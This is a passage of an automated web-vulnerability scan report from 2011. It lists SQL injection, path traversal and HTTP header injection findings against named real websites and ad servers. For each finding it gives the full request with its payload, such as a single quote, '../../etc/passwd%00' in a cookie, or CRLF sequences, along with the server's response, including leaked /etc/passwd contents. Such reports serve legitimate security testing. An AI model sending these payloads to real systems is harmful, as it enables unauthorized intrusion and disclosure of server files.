The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the REST URL parameter 1, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /wheretobuy'/ HTTP/1.1
Host: www.millerwelds.com
Proxy-Connection: keep-alive
Referer: http://www.millerwelds.com/landingf0d5d%22%3E%3Ca%3E5d463450d54/drive/?utm_source=PowerBlockTV&utm_campaign=toolsthatdrive&utm_medium=bannerad&utm_content=online
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-chcfmbmj=5B2E5297969312085019D619C67F4E55; __utmz=94003201.1303147760.1.1.utmcsr=PowerBlockTV|utmccn=toolsthatdrive|utmcmd=bannerad|utmcct=online; __utma=94003201.1070057693.1303147760.1303147760.1303147760.1; __utmc=94003201; __utmb=94003201.1.10.1303147760; __qca=P0-154865017-1303147760079

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Date: Mon, 18 Apr 2011 17:30:53 GMT
Connection: Keep-Alive
Content-Length: 27696

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   <
...[SNIP]...
</b>: 1064 (You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1)<br>
...[SNIP]...

1.80. http://www.millerwelds.com/wheretobuy/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.millerwelds.com
Path:   /wheretobuy/

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /wheretobuy/?1'=1 HTTP/1.1
Host: www.millerwelds.com
Proxy-Connection: keep-alive
Referer: http://www.millerwelds.com/landingf0d5d%22%3E%3Ca%3E5d463450d54/drive/?utm_source=PowerBlockTV&utm_campaign=toolsthatdrive&utm_medium=bannerad&utm_content=online
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-chcfmbmj=5B2E5297969312085019D619C67F4E55; __utmz=94003201.1303147760.1.1.utmcsr=PowerBlockTV|utmccn=toolsthatdrive|utmcmd=bannerad|utmcct=online; __utma=94003201.1070057693.1303147760.1303147760.1303147760.1; __utmc=94003201; __utmb=94003201.1.10.1303147760; __qca=P0-154865017-1303147760079

Response 1

HTTP/1.1 200 OK
Server: Apache/2.2
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Date: Mon, 18 Apr 2011 17:30:14 GMT
Connection: Keep-Alive
Content-Length: 25311

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
   <head>
       <meta http-equiv
...[SNIP]...
</b>: 1064 (You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1)<br>
...[SNIP]...

Request 2

GET /wheretobuy/?1''=1 HTTP/1.1
Host: www.millerwelds.com
Proxy-Connection: keep-alive
Referer: http://www.millerwelds.com/landingf0d5d%22%3E%3Ca%3E5d463450d54/drive/?utm_source=PowerBlockTV&utm_campaign=toolsthatdrive&utm_medium=bannerad&utm_content=online
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-chcfmbmj=5B2E5297969312085019D619C67F4E55; __utmz=94003201.1303147760.1.1.utmcsr=PowerBlockTV|utmccn=toolsthatdrive|utmcmd=bannerad|utmcct=online; __utma=94003201.1070057693.1303147760.1303147760.1303147760.1; __utmc=94003201; __utmb=94003201.1.10.1303147760; __qca=P0-154865017-1303147760079

Response 2

HTTP/1.1 200 OK
Server: Apache/2.2
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Date: Mon, 18 Apr 2011 17:30:16 GMT
Connection: Keep-Alive
Content-Length: 27203

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
   <head>
       <meta http-equiv
...[SNIP]...

1.81. http://www.socialfollow.com/button/image/ [b parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.socialfollow.com
Path:   /button/image/

Issue detail

The b parameter appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the b parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /button/image/?b=1649' HTTP/1.1
Host: www.socialfollow.com
Proxy-Connection: keep-alive
Referer: http://www3.ipass.com/mobile-employees/find-a-hotspot/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 18 Apr 2011 14:35:09 GMT
Server: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.12 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g mod_perl/2.0.3 Perl/v5.8.8
X-Powered-By: PHP/5.2.4-2ubuntu5.12
Content-Length: 1288
Content-Type: text/html

<br />
<b>Warning</b>: mysql_fetch_assoc(): supplied argument is not a valid MySQL result resource in <b>/var/www/vhosts/socialfollow.com/httpdocs/button/image/index.php</b> on line <b>3</b><br />
<b
...[SNIP]...

2. File path traversal
There are 2 instances of this issue:

Issue background

File path traversal vulnerabilities arise when user-controllable data is used within a filesystem operation in an unsafe manner. Typically, a user-supplied filename is appended to a directory prefix in order to read or write the contents of a file. If vulnerable, an attacker can supply path traversal sequences (using dot-dot-slash characters) to break out of the intended directory and read or write files elsewhere on the filesystem.

This is usually a very serious vulnerability, enabling an attacker to access sensitive files containing configuration data, passwords, database records, log data, source code, and program scripts and binaries.

Issue remediation

Ideally, application functionality should be designed in such a way that user-controllable data does not need to be passed to filesystem operations. This can normally be achieved either by referencing known files via an index number rather than their name, or by using application-generated filenames to save user-supplied file content.

If it is considered unavoidable to pass user-controllable data to a filesystem operation, three layers of defence can be employed to prevent path traversal attacks:



2.1. http://www.rockyou.com/fxtext/fxtext-create.php [lang cookie]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.rockyou.com
Path:   /fxtext/fxtext-create.php

Issue detail

The lang cookie is vulnerable to path traversal attacks, enabling read access to arbitrary files on the server.

The payload en../../../../../../../../etc/passwd%00en was submitted in the lang cookie. The requested file was returned in the application's response.

Request

GET /fxtext/fxtext-create.php HTTP/1.1
Host: www.rockyou.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: lastlogin=1303164637; lang=en../../../../../../../../etc/passwd%00en; istack=3%7Cwww202.rockyou.com%7C%7C%7Cwww202.rockyou.com%7C%7C3%7Cwww202.rockyou.com%7C%7C%7Cwww202.rockyou.com%7C%7C3%7Cwww202.rockyou.com%7C%7C%7Cwww202.rockyou.com%7C%7C3%7Cwww202.rockyou.com%7C%7C%7Cwww202.rockyou.com%7C%7C3%7Cwww202.rockyou.com%7C%7C%7Cwww202.rockyou.com; AAMBLFLAG=SET; sns_type=rockyou.com; ryuserid=deleted;

Response

HTTP/1.1 200 OK
Date: Mon, 18 Apr 2011 23:51:27 GMT
Server: Apache/2.2
X-Powered-By: PHP/5.2.6
Set-Cookie: ryuserid=deleted; expires=Sun, 18-Apr-2010 23:51:26 GMT; path=/; domain=.rockyou.com
Set-Cookie: lastlogin=1303170687; expires=Wed, 27-Jul-2011 23:51:27 GMT; path=/; domain=.rockyou.com
Set-Cookie: sns_type=deleted; expires=Sun, 18-Apr-2010 23:51:26 GMT; path=/; domain=.rockyou.com
Vary: Accept-Encoding,User-Agent
X-RyHeader: www202.rockyou.com took D=7180 microseconds to serve this request
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 85570

root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdow
...[SNIP]...
ucp:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
dbus:x:81:81:System message bus:/:/sbin/nologin
nscd:x:28:28:NSCD Daemon:/:/sbin/nologin
vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
rpc:x:32:32:Portmapp
...[SNIP]...

2.2. http://www.rockyou.com/show_my_gallery.php [lang cookie]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.rockyou.com
Path:   /show_my_gallery.php

Issue detail

The lang cookie is vulnerable to path traversal attacks, enabling read access to arbitrary files on the server.

The payload en../../../../../../../../etc/passwd%00en was submitted in the lang cookie. The requested file was returned in the application's response.

Request

GET /show_my_gallery.php HTTP/1.1
Host: www.rockyou.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: lastlogin=1303164637; lang=en../../../../../../../../etc/passwd%00en; istack=3%7Cwww202.rockyou.com%7C%7C%7Cwww202.rockyou.com%7C%7C3%7Cwww202.rockyou.com%7C%7C%7Cwww202.rockyou.com%7C%7C3%7Cwww202.rockyou.com%7C%7C%7Cwww202.rockyou.com%7C%7C3%7Cwww202.rockyou.com%7C%7C%7Cwww202.rockyou.com%7C%7C3%7Cwww202.rockyou.com%7C%7C%7Cwww202.rockyou.com; AAMBLFLAG=SET; sns_type=rockyou.com; ryuserid=deleted;

Response

HTTP/1.1 302 Found
Date: Mon, 18 Apr 2011 23:51:04 GMT
Server: Apache/2.2
X-Powered-By: PHP/5.2.6
Location: show_my_gallery2.php?
Set-Cookie: ctid=1; expires=Mon, 25-Apr-2011 23:51:04 GMT; path=/; domain=.rockyou.com
Set-Cookie: ryuserid=deleted; expires=Sun, 18-Apr-2010 23:51:03 GMT; path=/; domain=.rockyou.com
Set-Cookie: lastlogin=1303170664; expires=Wed, 27-Jul-2011 23:51:04 GMT; path=/; domain=.rockyou.com
Set-Cookie: sns_type=deleted; expires=Sun, 18-Apr-2010 23:51:03 GMT; path=/; domain=.rockyou.com
Vary: Accept-Encoding,User-Agent
X-RyHeader: www202.rockyou.com took D=9310 microseconds to serve this request
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 17248

root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdow
...[SNIP]...
ucp:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
dbus:x:81:81:System message bus:/:/sbin/nologin
nscd:x:28:28:NSCD Daemon:/:/sbin/nologin
vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
rpc:x:32:32:Portmapp
...[SNIP]...

3. HTTP header injection
There are 12 instances of this issue:

Issue background

HTTP header injection vulnerabilities arise when user-supplied data is copied into a response header in an unsafe way. If an attacker can inject newline characters into the header, then they can inject new HTTP headers and also, by injecting an empty line, break out of the headers into the message body and write arbitrary content into the application's response.

Various kinds of attack can be delivered via HTTP header injection vulnerabilities. Any attack that can be delivered via cross-site scripting can usually be delivered via header injection, because the attacker can construct a request which causes arbitrary JavaScript to appear within the response body. Further, it is sometimes possible to leverage header injection vulnerabilities to poison the cache of any proxy server via which users access the application. Here, an attacker sends a crafted request which results in a "split" response containing arbitrary content. If the proxy server can be manipulated to associate the injected response with another URL used within the application, then the attacker can perform a "stored" attack against this URL which will compromise other users who request that URL in future.

Issue remediation

If possible, applications should avoid copying user-controllable data into HTTP response headers. If this is unavoidable, then the data should be strictly validated to prevent header injection attacks. In most situations, it will be appropriate to allow only short alphanumeric strings to be copied into headers, and any other input should be rejected. At a minimum, input containing any characters with ASCII codes less than 0x20 should be rejected.


3.1. http://ad.doubleclick.net/adj/Rockyou.com/RockYou_Leaderboard_RON [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/Rockyou.com/RockYou_Leaderboard_RON

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 2f32b%0d%0a0d4ef121642 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /2f32b%0d%0a0d4ef121642/Rockyou.com/RockYou_Leaderboard_RON;sz=728x90;ord=1161383150732886? HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: ad.doubleclick.net

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/2f32b
0d4ef121642
/Rockyou.com/RockYou_Leaderboard_RON;sz=728x90;ord=1161383150732886:
Date: Mon, 18 Apr 2011 21:54:52 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

3.2. http://ad.doubleclick.net/adj/Rockyou.com/RockYou_Sky_RON [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/Rockyou.com/RockYou_Sky_RON

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 1d82d%0d%0a81cf5e4bc13 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /1d82d%0d%0a81cf5e4bc13/Rockyou.com/RockYou_Sky_RON;sz=160x600;ord=1161383150732886? HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: ad.doubleclick.net
Cookie: test_cookie=CheckForPermission

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/1d82d
81cf5e4bc13
/Rockyou.com/RockYou_Sky_RON;sz=160x600;ord=1161383150732886:
Date: Mon, 18 Apr 2011 21:55:05 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

3.3. http://ad.doubleclick.net/getcamphist [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /getcamphist

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 5f081%0d%0ac8413d74739 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /5f081%0d%0ac8413d74739;src=1517119;host=nike.112.2o7.net%2Fb%2Fss%2Fnikeall%2F1%2FH.22.1%2Fs25785419596359%3FAQB%3D1%26vvpr%3Dtrue%26%26pccr%3Dtrue%26vidn%3D26D6445C05013CEB-4000011060047DF3%26%26ndh%3D1%26t%3D18%252F3%252F2011%252013%253A54%253A25%25201%2520300%26vmt%3D4DCC71DA%26vmf%3Dnike.112.2o7.net%26ce%3DUTF-8%26ns%3Dnike%26pageName%3DGLGW%253Elang_selector%253Emain%26g%3Dhttp%253A%252F%252Fwww.nike.com%252Fnikeos%252Fp%252Fnike%252Flanguage_select%252F%26cc%3DUSD%26vvp%3DDFA%25231517119%253Av49%253D%255B%255B%2522DFA-%2522%252Blis%252B%2522-%2522%252Blip%252B%2522-%2522%252Blastimp%252B%2522-%2522%252Blastimptime%252B%2522-%2522%252Blcs%252B%2522-%2522%252Blcp%252B%2522-%2522%252Blastclk%252B%2522-%2522%252Blastclktime%255D%255D%26ch%3Dnike.com%26server%3Dnikeuslanding%26v5%3DD%253DUser-Agent%26c17%3Dlanguage_selector%26c18%3Dlanguage_selector%26c21%3Dlanguage_selector%26c22%3Dnon-id%26c24%3DD%253DUser-Agent%26c26%3DD%253Dg%26v48%3DD%253DpageName%26s%3D1920x1200%26c%3D16%26j%3D1.6%26v%3DY%26k%3DY%26bw%3D1333%26bh%3D1003%26p%3DShockwave%2520Flash%253BJava%2520Deployment%2520Toolkit%25206.0.240.7%253BJava%28TM%29%2520Platform%2520SE%25206%2520U24%253BSilverlight%2520Plug-In%253BChrome%2520PDF%2520Viewer%253BGoogle%2520Gears%25200.5.33.0%253BWPI%2520Detector%25201.3%253BGoogle%2520Update%253BDefault%2520Plug-in%253B%26AQE%3D1&A2S=1;ord=682341290 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.nike.com/nikeos/p/nike/language_select/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=22fba3001601008d||t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/5f081
c8413d74739
;src=1517119;host=nike.112.2o7.net/b/ss/nikeall/1/H.22.1/s25785419596359:
Date: Mon, 18 Apr 2011 18:55:19 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

3.4. http://ad.doubleclick.net/getcamphist [src parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /getcamphist

Issue detail

The value of the src request parameter is copied into the Location response header. The payload 918d0%0d%0aeee4041afc5 was submitted in the src parameter. This caused a response containing an injected HTTP header.

Request

GET /getcamphist;src=1517119;host=nike.112.2o7.net%2Fb%2Fss%2Fnikeall%2F1%2FH.22.1%2Fs25785419596359%3FAQB%3D1%26vvpr%3Dtrue%26%26pccr%3Dtrue%26vidn%3D26D6445C05013CEB-4000011060047DF3%26%26ndh%3D1%26t%3D18%252F3%252F2011%252013%253A54%253A25%25201%2520300%26vmt%3D4DCC71DA%26vmf%3Dnike.112.2o7.net%26ce%3DUTF-8%26ns%3Dnike%26pageName%3DGLGW%253Elang_selector%253Emain%26g%3Dhttp%253A%252F%252Fwww.nike.com%252Fnikeos%252Fp%252Fnike%252Flanguage_select%252F%26cc%3DUSD%26vvp%3DDFA%25231517119%253Av49%253D%255B%255B%2522DFA-%2522%252Blis%252B%2522-%2522%252Blip%252B%2522-%2522%252Blastimp%252B%2522-%2522%252Blastimptime%252B%2522-%2522%252Blcs%252B%2522-%2522%252Blcp%252B%2522-%2522%252Blastclk%252B%2522-%2522%252Blastclktime%255D%255D%26ch%3Dnike.com%26server%3Dnikeuslanding%26v5%3DD%253DUser-Agent%26c17%3Dlanguage_selector%26c18%3Dlanguage_selector%26c21%3Dlanguage_selector%26c22%3Dnon-id%26c24%3DD%253DUser-Agent%26c26%3DD%253Dg%26v48%3DD%253DpageName%26s%3D1920x1200%26c%3D16%26j%3D1.6%26v%3DY%26k%3DY%26bw%3D1333%26bh%3D1003%26p%3DShockwave%2520Flash%253BJava%2520Deployment%2520Toolkit%25206.0.240.7%253BJava%28TM%29%2520Platform%2520SE%25206%2520U24%253BSilverlight%2520Plug-In%253BChrome%2520PDF%2520Viewer%253BGoogle%2520Gears%25200.5.33.0%253BWPI%2520Detector%25201.3%253BGoogle%2520Update%253BDefault%2520Plug-in%253B%26AQE%3D1918d0%0d%0aeee4041afc5&A2S=1;ord=682341290 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.nike.com/nikeos/p/nike/language_select/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=22fba3001601008d||t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 302 Moved Temporarily
Content-Length: 0
Location: http://nike.112.2o7.net/b/ss/nikeall/1/H.22.1/s25785419596359?AQB=1&vvpr=true&&pccr=true&vidn=26D6445C05013CEB-4000011060047DF3&&ndh=1&t=18%2F3%2F2011%2013%3A54%3A25%201%20300&vmt=4DCC71DA&vmf=nike.112.2o7.net&ce=UTF-8&ns=nike&pageName=GLGW%3Elang_selector%3Emain&g=http%3A%2F%2Fwww.nike.com%2Fnikeos%2Fp%2Fnike%2Flanguage_select%2F&cc=USD&vvp=DFA%231517119%3Av49%3D%5B%5B%22DFA-%22%2Blis%2B%22-%22%2Blip%2B%22-%22%2Blastimp%2B%22-%22%2Blastimptime%2B%22-%22%2Blcs%2B%22-%22%2Blcp%2B%22-%22%2Blastclk%2B%22-%22%2Blastclktime%5D%5D&ch=nike.com&server=nikeuslanding&v5=D%3DUser-Agent&c17=language_selector&c18=language_selector&c21=language_selector&c22=non-id&c24=D%3DUser-Agent&c26=D%3Dg&v48=D%3DpageName&s=1920x1200&c=16&j=1.6&v=Y&k=Y&bw=1333&bh=1003&p=Shockwave%20Flash%3BJava%20Deployment%20Toolkit%206.0.240.7%3BJava(TM)%20Platform%20SE%206%20U24%3BSilverlight%20Plug-In%3BChrome%20PDF%20Viewer%3BGoogle%20Gears%200.5.33.0%3BWPI%20Detector%201.3%3BGoogle%20Update%3BDefault%20Plug-in%3B&AQE=1918d0
eee4041afc5
&A2S=1/respcamphist;src=1517119;ec=nh;rch=2;lastimp=0;lastimptime=0;lis=0;lip=0;lic=0;lir=0;lirv=0;likv=0;lipn=;lastclk=0;lastclktime=0;lcs=0;lcp=0;lcc=0;lcr=0;lcrv=0;lckv=0;lcpn=;ord=1303152847:
Date: Mon, 18 Apr 2011 18:54:07 GMT
Server: GFE/2.0
Content-Type: text/html


3.5. http://mp.apmebf.com/ad/js/16228-124632-26209-0 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://mp.apmebf.com
Path:   /ad/js/16228-124632-26209-0

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload b064f%0d%0ac62025c962b was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /b064f%0d%0ac62025c962b/js/16228-124632-26209-0?mpt=33312011918&mpvc=&host=altfarm.mediaplex.com HTTP/1.1
Host: mp.apmebf.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Found
Date: Mon, 18 Apr 2011 13:49:52 GMT
Server: Apache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR PSAo PSDo OUR IND UNI COM NAV"
Set-Cookie: S=g14vo-36788-1303134592740-yo; domain=.apmebf.com; path=/; expires=Wed, 17-Apr-2013 13:49:52 GMT
Location: http://altfarm.mediaplex.com/b064f
c62025c962b
/js/16228-124632-26209-0?mpt=33312011918&mpvc=&no_cj_c=1&upsid=067757709239
Content-Length: 318
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://altfarm.mediaplex.com/b064f
c62025c962b
...[SNIP]...

3.6. http://mp.apmebf.com/ad/js/16228-124632-26209-0 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://mp.apmebf.com
Path:   /ad/js/16228-124632-26209-0

Issue detail

The value of REST URL parameter 2 is copied into the Location response header. The payload cf199%0d%0a4d8654acbda was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.

Request

GET /ad/cf199%0d%0a4d8654acbda/16228-124632-26209-0?mpt=33312011918&mpvc=&host=altfarm.mediaplex.com HTTP/1.1
Host: mp.apmebf.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Found
Date: Mon, 18 Apr 2011 13:49:52 GMT
Server: Apache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR PSAo PSDo OUR IND UNI COM NAV"
Set-Cookie: S=g14vo-37088-1303134592866-4a; domain=.apmebf.com; path=/; expires=Wed, 17-Apr-2013 13:49:52 GMT
Location: http://altfarm.mediaplex.com/ad/cf199
4d8654acbda
/16228-124632-26209-0?mpt=33312011918&mpvc=&no_cj_c=1&upsid=896130692879
Content-Length: 318
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://altfarm.mediaplex.com/ad/cf199
4d8654ac
...[SNIP]...

3.7. http://mp.apmebf.com/ad/js/16228-124632-26209-0 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://mp.apmebf.com
Path:   /ad/js/16228-124632-26209-0

Issue detail

The value of REST URL parameter 3 is copied into the Location response header. The payload 86555%0d%0a225983431ef was submitted in the REST URL parameter 3. This caused a response containing an injected HTTP header.

Request

GET /ad/js/86555%0d%0a225983431ef?mpt=33312011918&mpvc=&host=altfarm.mediaplex.com HTTP/1.1
Host: mp.apmebf.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Found
Date: Mon, 18 Apr 2011 13:49:52 GMT
Server: Apache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR PSAo PSDo OUR IND UNI COM NAV"
Set-Cookie: S=g14vo-5289-1303134592990-y7; domain=.apmebf.com; path=/; expires=Wed, 17-Apr-2013 13:49:52 GMT
Location: http://altfarm.mediaplex.com/ad/js/86555
225983431ef
?mpt=33312011918&mpvc=&no_cj_c=1&upsid=774198745752
Content-Length: 300
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
